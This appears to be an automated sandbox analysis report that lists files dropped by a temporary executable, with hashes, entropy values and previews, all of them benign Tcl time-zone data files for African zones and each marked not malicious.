                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Algiers) {. {-9223372036854775808 732 0 LMT}. {-2486679072 561 0 PMT}. {-1855958961 0 0 WET}. {-1689814800 3600 1 WEST}. {-1680397200 0 0 WET}. {-1665363600 3600 1 WEST}. {-1648342800 0 0 WET}. {-1635123600 3600 1 WEST}. {-1616893200 0 0 WET}. {-1604278800 3600 1 WEST}. {-1585443600 0 0 WET}. {-1574038800 3600 1 WEST}. {-1552266000 0 0 WET}. {-1539997200 3600 1 WEST}. {-1531443600 0 0 WET}. {-956365200 3600 1 WEST}. {-950486400 0 0 WET}. {-942012000 3600 0 CET}. {-812502000 7200 1 CEST}. {-796262400 3600 0 CET}. {-781052400 7200 1 CEST}. {-766630800 3600 0 CET}. {-733280400 0 0 WET}. {-439430400 3600 0 CET}. {-212029200 0 0 WET}. {41468400 3600 1 WEST}. {54774000 0 0 WET}. {231724800 3600 1 WEST}. {246240000 3600 0 CET}. {259545600 7200 1 CEST}. {275274000 3600 0 CET}. {309740400 0 0 WET}. {325468800 3600 1 WEST}. {3418020
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):179
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.750118730136804
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsVVMMvwVAIgNGExVMSt2DcjEUEH+DcVVMMv:SlSWB9IZaM3y7VcVAIgNTxL2DGs+Dkr
                                                                                                                                                                                                                                                                                                                                MD5:F8CEC826666174899C038EC9869576ED
                                                                                                                                                                                                                                                                                                                                SHA1:4CAA32BB070F31BE919F5A03141711DB22072E2C
                                                                                                                                                                                                                                                                                                                                SHA-256:D9C940B3BE2F9E424BC6F69D665C21FBCA7F33789E1FE1D27312C0B38B75E097
                                                                                                                                                                                                                                                                                                                                SHA-512:DA890F5A6806AE6774CFC061DFD4AE069F78212AB063287146245692383022AABB3637DEB49C1D512DA3499DC4295541962DAC05729302B3314E7BF306E6CB41
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Nairobi)]} {. LoadTimeZoneFile Africa/Nairobi.}.set TZData(:Africa/Asmara) $TZData(:Africa/Nairobi).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):179
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.755468133981916
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsVVMMvwVAIgNGExVMSt2DcjAWDcVVMMv:SlSWB9IZaM3y7VcVAIgNTxL2D8Dkr
                                                                                                                                                                                                                                                                                                                                MD5:8B5DCBBDB2309381EAA8488E1551655F
                                                                                                                                                                                                                                                                                                                                SHA1:65065868620113F759C5D37B89843A334E64D210
                                                                                                                                                                                                                                                                                                                                SHA-256:F7C8CEE9FA2A4BF9F41ABA18010236AC4CCD914ACCA9E568C87EDA0503D54014
                                                                                                                                                                                                                                                                                                                                SHA-512:B8E61E6D5057CD75D178B292CD19CBCED2A127099D95046A7448438BCC035DE4066FDD637E9055AC3914E4A8EAA1B0123FA0E90E4F7042B2C4551BB009F1D2E9
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Nairobi)]} {. LoadTimeZoneFile Africa/Nairobi.}.set TZData(:Africa/Asmera) $TZData(:Africa/Nairobi).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):179
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.83500517532947
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqss1kvFVAIgNGE4Rvt2DcxAQDcsP:SlSWB9IZaM3y7sYFVAIgNT4tt2DwNDBP
                                                                                                                                                                                                                                                                                                                                MD5:FCBE668127DFD81CB0F730C878EB2F1A
                                                                                                                                                                                                                                                                                                                                SHA1:F27C9D96A04A12AC7423A60A756732B360D6847D
                                                                                                                                                                                                                                                                                                                                SHA-256:6F462C2C5E190EFCA68E882CD61D5F3A8EF4890761376F22E9905B1B1B6FDE9F
                                                                                                                                                                                                                                                                                                                                SHA-512:B0E6E4F5B46A84C2D02A0519831B98F336AA79079FF2CB9F290D782335FB4FB39A3453520424ED3761D801B9FBE39228B1D045C40EDD70B29801C26592F9805A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Abidjan)]} {. LoadTimeZoneFile Africa/Abidjan.}.set TZData(:Africa/Bamako) $TZData(:Africa/Abidjan).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):173
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.834042129935993
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsGe4FVAIgNGESIRL2Dcx2m/2DcGev:SlSWB9IZaM3y7V4FVAIgNT9L2Dw/2D4v
                                                                                                                                                                                                                                                                                                                                MD5:7A017656AB8048BD67250207CA265717
                                                                                                                                                                                                                                                                                                                                SHA1:F2BB86BC7B7AB886738A33ADA37C444D6873DB94
                                                                                                                                                                                                                                                                                                                                SHA-256:E31F69E16450B91D79798C1064FEA18DE89D5FE343D2DE4A5190BCF15225E69D
                                                                                                                                                                                                                                                                                                                                SHA-512:695FA7369341F1F4BC1B629CDAB1666BEFE2E7DB32D75E5038DC17526A3CCE293DB36AFEB0955B06F5834D43AEF140F7A66EC52598444DBE8C8B70429DBE5FC5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Lagos)]} {. LoadTimeZoneFile Africa/Lagos.}.set TZData(:Africa/Bangui) $TZData(:Africa/Lagos).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):179
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.839691887198201
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqss1kvFVAIgNGE4Rvt2Dcx79FHp4DcsP:SlSWB9IZaM3y7sYFVAIgNT4tt2Dw7J4V
                                                                                                                                                                                                                                                                                                                                MD5:149DD4375235B088386A2D187ED03FFB
                                                                                                                                                                                                                                                                                                                                SHA1:5E879B778E2AB110AC7815D3D62A607A76AAB93B
                                                                                                                                                                                                                                                                                                                                SHA-256:1769E15721DAFF477E655FF7A8491F4954FB2F71496287C6F9ED265FE5588E00
                                                                                                                                                                                                                                                                                                                                SHA-512:4F997EDE6F04A89240E0950D605BB43D6814DCCA433F3A75F330FA13EE8729A10D20E9A0AAD6E6912370E350ABD5A65B878B914FCC9A5CA8503E3A5485E57B3E
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Abidjan)]} {. LoadTimeZoneFile Africa/Abidjan.}.set TZData(:Africa/Banjul) $TZData(:Africa/Abidjan).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):169
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.797400281087303
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx52Dc5ixXGm2OHGVkevUdSaw7FFFkhSVPVFd:SlSWB9X52D4fm2OHCkeVawBFF2mh
                                                                                                                                                                                                                                                                                                                                MD5:BA4959590575031330280A4ADC7017D1
                                                                                                                                                                                                                                                                                                                                SHA1:34FBC2AFD2E13575D286062050D98ABC4BF7C7A6
                                                                                                                                                                                                                                                                                                                                SHA-256:2C06A94A43AC7F0079E6FE371F0D5A06A7BF23A868AC3B10135BFC4266CD2D4E
                                                                                                                                                                                                                                                                                                                                SHA-512:65E6161CB6AF053B53C7ABE1E4CAAD4F40E350D52BADCB95EB37138268D17CF48DDB0CA771F450ECD8E6A57C99BE2E8C2227A28B5C4AF3DE7F6D74F255118F04
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Bissau) {. {-9223372036854775808 -3740 0 LMT}. {-1830380400 -3600 0 -01}. {157770000 0 0 GMT}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):178
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.856245693637169
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsfKGyVAIgNGEjKKW62Dc8ycXp75h4DcfKu:SlSWB9IZaM3y7fYVAIgNTj5W62DAmp1T
                                                                                                                                                                                                                                                                                                                                MD5:3F6E187410D0109D05410EFC727FB5E5
                                                                                                                                                                                                                                                                                                                                SHA1:CAB54D985823218E01EDF9165CABAB7A984EE93E
                                                                                                                                                                                                                                                                                                                                SHA-256:9B2EEB0EF36F851349E254E1745D11B65CB30A16A2EE4A87004765688A5E0452
                                                                                                                                                                                                                                                                                                                                SHA-512:E12D6DBEA8DE9E3FB236011B962FFE1AEB95E3353B13303C343565B60AA664508D51A011C66C3CE2460C52A901495F46D0500C9B74E19399AE66231E5D6200A0
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Maputo)]} {. LoadTimeZoneFile Africa/Maputo.}.set TZData(:Africa/Blantyre) $TZData(:Africa/Maputo).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):178
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.853052123353996
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsGe4FVAIgNGESIRL2DciE0TMJZp4DcGev:SlSWB9IZaM3y7V4FVAIgNT9L2D4qGp4e
                                                                                                                                                                                                                                                                                                                                MD5:4F5159996C16A171D9B011C79FDDBF63
                                                                                                                                                                                                                                                                                                                                SHA1:51BCA6487762E42528C845CCA33173B3ED707B3F
                                                                                                                                                                                                                                                                                                                                SHA-256:E73ADC4283ECA7D8504ABC6CB28D98EB071ED867F77DE9FADA777181533AD1D0
                                                                                                                                                                                                                                                                                                                                SHA-512:6E5D4DF903968395DFDB834FBD4B2A0294E945A9939D05BED8533674EA0ACE8393731DDCDFACF7F2C9A00D38DC8F5EDB173B4025CF05122B0927829D07ED203F
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Lagos)]} {. LoadTimeZoneFile Africa/Lagos.}.set TZData(:Africa/Brazzaville) $TZData(:Africa/Lagos).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):179
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.900915013374923
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsfKGyVAIgNGEjKKW62DclbDcfKu:SlSWB9IZaM3y7fYVAIgNTj5W62DkbDE/
                                                                                                                                                                                                                                                                                                                                MD5:9E81B383C593422481B5066CF23B8CE1
                                                                                                                                                                                                                                                                                                                                SHA1:8DD0408272CBE6DF1D5051CB4D9319B5A1BD770E
                                                                                                                                                                                                                                                                                                                                SHA-256:9ADCD7CB6309049979ABF8D128C1D1BA35A02F405DB8DA8C39D474E8FA675E38
                                                                                                                                                                                                                                                                                                                                SHA-512:9939ED703EC26350DE9CC59BF7A8C76B6B3FE3C67E47CCDDE86D87870711224ADEEC61D93AC7926905351B8333AD01FF235276A5AB766474B5884F8A0329C2CB
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Maputo)]} {. LoadTimeZoneFile Africa/Maputo.}.set TZData(:Africa/Bujumbura) $TZData(:Africa/Maputo).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):3720
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.687670811431724
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:5hRg1oCSY0WF6yU0yWZVYbZ0F0ZeTvc0jDlSBFX84aKqITVuV09ONWHr0L0335Kw:Fu0oVy0FUeLIvQV8c0OvOakCUUO
                                                                                                                                                                                                                                                                                                                                MD5:1B38D083FC54E17D82935D400051F571
                                                                                                                                                                                                                                                                                                                                SHA1:AE34C08176094F4C4BFEB4E1BBAE6034BCD03A11
                                                                                                                                                                                                                                                                                                                                SHA-256:11283B69DE0D02EAB1ECF78392E3A4B32288CCFEF946F0432EC83327A51AEDDC
                                                                                                                                                                                                                                                                                                                                SHA-512:581161079EC0F77EEB119C96879FD586AE49997BAD2C5124C360BCACF9136FF0A6AD70AE7D4C88F96BC94EEB87F628E8890E65DB9B0C96017659058D35436307
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Cairo) {. {-9223372036854775808 7509 0 LMT}. {-2185409109 7200 0 EET}. {-929844000 10800 1 EEST}. {-923108400 7200 0 EET}. {-906170400 10800 1 EEST}. {-892868400 7200 0 EET}. {-875844000 10800 1 EEST}. {-857790000 7200 0 EET}. {-844308000 10800 1 EEST}. {-825822000 7200 0 EET}. {-812685600 10800 1 EEST}. {-794199600 7200 0 EET}. {-779853600 10800 1 EEST}. {-762663600 7200 0 EET}. {-399088800 10800 1 EEST}. {-386650800 7200 0 EET}. {-368330400 10800 1 EEST}. {-355114800 7200 0 EET}. {-336790800 10800 1 EEST}. {-323654400 7200 0 EET}. {-305168400 10800 1 EEST}. {-292032000 7200 0 EET}. {-273632400 10800 1 EEST}. {-260496000 7200 0 EET}. {-242096400 10800 1 EEST}. {-228960000 7200 0 EET}. {-210560400 10800 1 EEST}. {-197424000 7200 0 EET}. {-178938000 10800 1 EEST}. {-165801600 7200 0 EET}. {-147402000 10800 1 EEST}. {-134265600 72
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1567
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.593430930151928
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:5qSFbS4PUuMfMSAdZXfSGjX6JAzS26WZrW0SKQYXRWXpSjv:YmG0HZPcOQy1p
                                                                                                                                                                                                                                                                                                                                MD5:9DB3A6EB1162C5D814B98265FB58D004
                                                                                                                                                                                                                                                                                                                                SHA1:63ACAD6C18B49EF6794610ADED9865C8600A4D5C
                                                                                                                                                                                                                                                                                                                                SHA-256:EF30CFFD1285339F4CC1B655CB4CB8C5D864C4B575D66F18919A35C084AA4E5F
                                                                                                                                                                                                                                                                                                                                SHA-512:0581F6640BDDD8C33E82983F2186EB0952946C70A4B3F524EC78D1BE3EC1FA10BC3672A99CBA3475B28C0798D62A14F298207160F04EE0861EDDA352DA2BCCA0
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Casablanca) {. {-9223372036854775808 -1820 0 LMT}. {-1773012580 0 0 +00}. {-956361600 3600 1 +00}. {-950490000 0 0 +00}. {-942019200 3600 1 +00}. {-761187600 0 0 +00}. {-617241600 3600 1 +00}. {-605149200 0 0 +00}. {-81432000 3600 1 +00}. {-71110800 0 0 +00}. {141264000 3600 1 +00}. {147222000 0 0 +00}. {199756800 3600 1 +00}. {207702000 0 0 +00}. {231292800 3600 1 +00}. {244249200 0 0 +00}. {265507200 3600 1 +00}. {271033200 0 0 +00}. {448243200 3600 0 +01}. {504918000 0 0 +00}. {1212278400 3600 1 +00}. {1220223600 0 0 +00}. {1243814400 3600 1 +00}. {1250809200 0 0 +00}. {1272758400 3600 1 +00}. {1281222000 0 0 +00}. {1301788800 3600 1 +00}. {1312066800 0 0 +00}. {1335664800 3600 1 +00}. {1342749600 0 0 +00}. {1345428000 3600 1 +00}. {1348970400 0 0 +00}. {1367114400 3600 1 +00}. {1373162400 0 0 +00}. {1376100000 3600
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7277
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.744402699283941
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:/N8d9VA1URbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZQltUbAT:/AHAiRNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                                                                                                MD5:261E339A2575F28099CD783B52F0980C
                                                                                                                                                                                                                                                                                                                                SHA1:F7EB8B3DAE9C07382D5123225B3EAA4B5BFD47D6
                                                                                                                                                                                                                                                                                                                                SHA-256:9C7D0E75AFC5681579D1018D7259733473EEDFFAF7313016B60159CB2A4DCAB5
                                                                                                                                                                                                                                                                                                                                SHA-512:8E622174CB6DB4D0172DBC2E408867F03EBB7D1D54AA51D99C4465945CFF369AAFAF17D1D0F9277E69CBE3AD6AAF9A0C6EE056017474DF171E94BD28BBA9C04A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Ceuta) {. {-9223372036854775808 -1276 0 LMT}. {-2177452800 0 0 WET}. {-1630112400 3600 1 WEST}. {-1616810400 0 0 WET}. {-1451692800 0 0 WET}. {-1442451600 3600 1 WEST}. {-1427673600 0 0 WET}. {-1379293200 3600 1 WEST}. {-1364774400 0 0 WET}. {-1348448400 3600 1 WEST}. {-1333324800 0 0 WET}. {-1316390400 3600 1 WEST}. {-1301270400 0 0 WET}. {-1293840000 0 0 WET}. {-94694400 0 0 WET}. {-81432000 3600 1 WEST}. {-71110800 0 0 WET}. {141264000 3600 1 WEST}. {147222000 0 0 WET}. {199756800 3600 1 WEST}. {207702000 0 0 WET}. {231292800 3600 1 WEST}. {244249200 0 0 WET}. {265507200 3600 1 WEST}. {271033200 0 0 WET}. {448243200 3600 0 CET}. {504918000 3600 0 CET}. {512528400 7200 1 CEST}. {528253200 3600 0 CET}. {543978000 7200 1 CEST}. {559702800 3600 0 CET}. {575427600 7200 1 CEST}. {591152400 3600 0 CET}. {606877200 7200 1 CEST}
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):180
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.832452688412801
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqss1kvFVAIgNGE4Rvt2DcmMM1+DcsP:SlSWB9IZaM3y7sYFVAIgNT4tt2DCM1+V
                                                                                                                                                                                                                                                                                                                                MD5:DC007D4B9C02AAD2DBD48E73624B893E
                                                                                                                                                                                                                                                                                                                                SHA1:9BEE9D21566D6C6D4873EFF9429AE3D3F85BA4E4
                                                                                                                                                                                                                                                                                                                                SHA-256:3BF37836C9358EC0ABD9691D8F59E69E8F6084A133A50650239890C458D4AA41
                                                                                                                                                                                                                                                                                                                                SHA-512:45D3BC383A33F7079A6D04079112FD73DB2DDBB7F81BFF8172FABCAA949684DC31C8B156E647F77AF8BA26581D3812D510C250CDC4D7EEEC788DDB2B77CD47E8
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Abidjan)]} {. LoadTimeZoneFile Africa/Abidjan.}.set TZData(:Africa/Conakry) $TZData(:Africa/Abidjan).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):178
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.8075658510312484
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqss1kvFVAIgNGE4Rvt2DcXXMFBx/2DcsP:SlSWB9IZaM3y7sYFVAIgNT4tt2DKXEB4
                                                                                                                                                                                                                                                                                                                                MD5:CDA180DB8DF825268DB06298815C96F0
                                                                                                                                                                                                                                                                                                                                SHA1:20B082082CFA0DF49C0DF4FD698EBD061280A2BB
                                                                                                                                                                                                                                                                                                                                SHA-256:95D31A4B3D9D9977CBDDD55275492A5A954F431B1FD1442C519255FBC0DBA615
                                                                                                                                                                                                                                                                                                                                SHA-512:2D35698DE3BF1E90AB37C84ED4E3D0B57F02555A8AEB98659717EEC1D5EED17044D446E12B5AAC12A9721A3F9667343C5CACD7AB00BF986285B8084FF9384654
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Abidjan)]} {. LoadTimeZoneFile Africa/Abidjan.}.set TZData(:Africa/Dakar) $TZData(:Africa/Abidjan).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):186
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.795449330458551
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsVVMMvwVAIgNGExVMSt2Dc8bEH+DcVVMMv:SlSWB9IZaM3y7VcVAIgNTxL2DJbVDkr
                                                                                                                                                                                                                                                                                                                                MD5:AF8E3E86312E3A789B82CECEDDB019CE
                                                                                                                                                                                                                                                                                                                                SHA1:6B353BAB18E897151BF274D6ACF410CDFF6F00F0
                                                                                                                                                                                                                                                                                                                                SHA-256:F39E4CABE33629365C2CEF6037871D698B942F0672F753212D768E865480B822
                                                                                                                                                                                                                                                                                                                                SHA-512:9891AA26C4321DD5C4A9466F2EE84B14F18D3FFD71D6E8D2DE5CAFE4DC563D85A934B7B4E55926B30181761EF8C9B6C97746F522718BAE9DCBE4BDDE70C42B53
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Nairobi)]} {. LoadTimeZoneFile Africa/Nairobi.}.set TZData(:Africa/Dar_es_Salaam) $TZData(:Africa/Nairobi).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):181
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.779330261863059
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsVVMMvwVAIgNGExVMSt2DcRHKQ1BQDcVVMMv:SlSWB9IZaM3y7VcVAIgNTxL2DOrkDkr
                                                                                                                                                                                                                                                                                                                                MD5:1440C37011F8F31213AE5833A3FCD5E1
                                                                                                                                                                                                                                                                                                                                SHA1:9EEE9D7BB3A1E29EDDE90D7DBE63ED50513A909B
                                                                                                                                                                                                                                                                                                                                SHA-256:A4E0E775206EDBA439A454649A7AC94AE3AFEADC8717CBD47FD7B8AC41ADB06F
                                                                                                                                                                                                                                                                                                                                SHA-512:D82FF9C46C8845A6F15DC96AF8D98866C601EF0B4F7F5F0260AD571DD46931E90443FFEB5910D5805C5A43F6CC8866116066565646AE2C96E1D260999D1641F0
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Nairobi)]} {. LoadTimeZoneFile Africa/Nairobi.}.set TZData(:Africa/Djibouti) $TZData(:Africa/Nairobi).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):173
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.800219030063992
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsGe4FVAIgNGESIRL2DcnKe2DcGev:SlSWB9IZaM3y7V4FVAIgNT9L2Dml2D4v
                                                                                                                                                                                                                                                                                                                                MD5:18C0C9E9D5154E20CC9301D5012066B9
                                                                                                                                                                                                                                                                                                                                SHA1:8395E917261467EC5C27034C980EDD05F2242F40
                                                                                                                                                                                                                                                                                                                                SHA-256:0595C402B8499FC1B67C196BEE24BCA4DE14D3E10B8DBBD2840D2B4C88D9DF28
                                                                                                                                                                                                                                                                                                                                SHA-512:C53540E25B76DF8EC3E2A5F27B473F1D6615BFBD043E133867F3391B057D8552350F912DF55DD11C1357765EF76D8E286BBBE839F28295D09751243DC0201BDF
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Lagos)]} {. LoadTimeZoneFile Africa/Lagos.}.set TZData(:Africa/Douala) $TZData(:Africa/Lagos).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1281
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6551425401331312
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQbe5T7pkNUSMSA7ZXgUSGjX6JAWqS26WZrW0SKQYJZRWXpSjv:5opMfMSA7ZXfSGjX6JAzS26WZrW0SKQm
                                                                                                                                                                                                                                                                                                                                MD5:8E9FF3CB18879B1C69A04F45715D24BB
